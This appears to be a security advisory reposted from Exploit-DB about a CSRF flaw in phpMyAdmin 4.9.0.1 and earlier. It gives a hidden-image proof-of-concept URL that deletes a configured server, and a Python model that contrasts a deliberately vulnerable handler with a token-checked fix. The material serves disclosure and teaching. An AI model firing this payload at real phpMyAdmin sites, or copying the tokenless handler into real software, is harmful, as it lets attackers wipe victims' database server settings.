Posted by Koray, September 13, 2019

phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB.

A Cross-Site Request Forgery vulnerability has been detected in phpMyAdmin that allows an attacker to trigger a CSRF attack against a phpMyAdmin user, deleting any server in the Setup page.

PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server

<p>Deleting Server 1</p>
<img src="http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />

BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that they want to execute on behalf of the user, in this way making a CSRF attack possible due to the wrong use of the HTTP method.

SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1

SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests.

Source: https://www.exploit-db.com/exploits/47385
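The post's two points, the state change on a bare GET and the fix of validating a token on each call, are easier to see side by side. The following is an added example, not phpMyAdmin's own code and not from the advisory: a small Python model of a "remove server" handler in its vulnerable form (any GET with mode=remove&id=N deletes server N, no token) and a hardened form (POST only, plus a per-session token compared in constant time). The Request class, the session layout with a "token" key, and the victim/server data are constructed assumptions for the demonstration; the attack URL is the one from the proof of concept.

```python
"""Model of the setup 'remove server' action: GET-with-no-token (CSRF-able)
versus POST-plus-session-token.  Example code, not phpMyAdmin's own."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class Request:
    """Hypothetical request object standing in for what a framework hands a handler."""
    method: str
    query: dict                                   # parsed query string
    form: dict = field(default_factory=dict)      # parsed POST body
    session: dict = field(default_factory=dict)   # server-side session (cookie-bound)


def request_from_url(url, session, method="GET", form=None):
    """Build a Request from a URL such as the advisory's <img src=...>."""
    qs = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    return Request(method, qs, form or {}, session)


def vulnerable_remove_server(req, servers):
    """Pre-fix shape: mode=remove&id=N removes server N regardless of HTTP
    method and with no token check, so a cross-site <img> fetch suffices."""
    if req.query.get("page") == "servers" and req.query.get("mode") == "remove":
        servers.pop(int(req.query.get("id", 0)), None)
        return "removed"
    return "ignored"


def issue_token(session):
    """Mint a per-session anti-CSRF token (assumed session key 'token')."""
    if "token" not in session:
        session["token"] = secrets.token_hex(32)
    return session["token"]


def hardened_remove_server(req, servers):
    """State change only on POST, and only when the submitted token matches
    the one stored in the victim's session; the comparison is constant-time."""
    if req.method != "POST":
        return "rejected: state change requires POST"
    supplied = req.form.get("token", "")
    expected = req.session.get("token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: missing or invalid token"
    if req.query.get("page") == "servers" and req.query.get("mode") == "remove":
        servers.pop(int(req.query.get("id", 0)), None)
        return "removed"
    return "ignored"


# URL from the advisory's proof of concept.
ATTACK_URL = "http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"


def simulate():
    """Replay the <img> fetch (and a forged POST) against both handlers.
    Returns each outcome together with the surviving server table."""
    victim_session = {"user": "admin"}      # constructed: a logged-in victim
    issue_token(victim_session)

    servers_a = {1: "main", 2: "replica"}   # constructed server tables
    servers_b = {1: "main", 2: "replica"}
    servers_c = {1: "main", 2: "replica"}

    # 1. Victim's browser loads the attacker's <img>: a GET that carries the
    #    session cookie but nothing the attacker could not have guessed.
    img_fetch = request_from_url(ATTACK_URL, victim_session)
    vuln = vulnerable_remove_server(img_fetch, servers_a)
    hard_get = hardened_remove_server(img_fetch, servers_b)

    # 2. Attacker upgrades to an auto-submitting cross-site form: still no
    #    valid token, because the token lives in the victim's session/page,
    #    not in the cookie the browser attaches automatically.
    forged_post = request_from_url(ATTACK_URL, victim_session, "POST", {"token": "guess"})
    hard_forged = hardened_remove_server(forged_post, servers_b)

    # 3. A legitimate submission from the application's own form carries the token.
    legit = request_from_url(ATTACK_URL, victim_session, "POST",
                             {"token": victim_session["token"]})
    hard_legit = hardened_remove_server(legit, servers_c)

    return {
        "vulnerable_get": (vuln, servers_a),
        "hardened_get": (hard_get, servers_b),
        "hardened_forged_post": (hard_forged, servers_b),
        "hardened_legit_post": (hard_legit, servers_c),
    }


if __name__ == "__main__":
    for name, (outcome, servers) in simulate().items():
        print(f"{name:22s} {outcome:42s} servers={servers}")
```

Requiring POST alone is not the fix; it only removes the `<img>`-tag vector, since a hidden auto-submitting form can still send a cross-site POST with the victim's cookies. The token check is what blocks step 2, and binding the token to the session (and comparing it with hmac.compare_digest rather than ==) is what keeps it from being guessed or leaked through timing.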